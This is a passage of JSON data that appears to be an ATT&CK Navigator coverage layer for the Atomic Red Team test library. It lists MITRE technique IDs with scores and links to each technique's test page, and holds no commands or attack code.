Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View 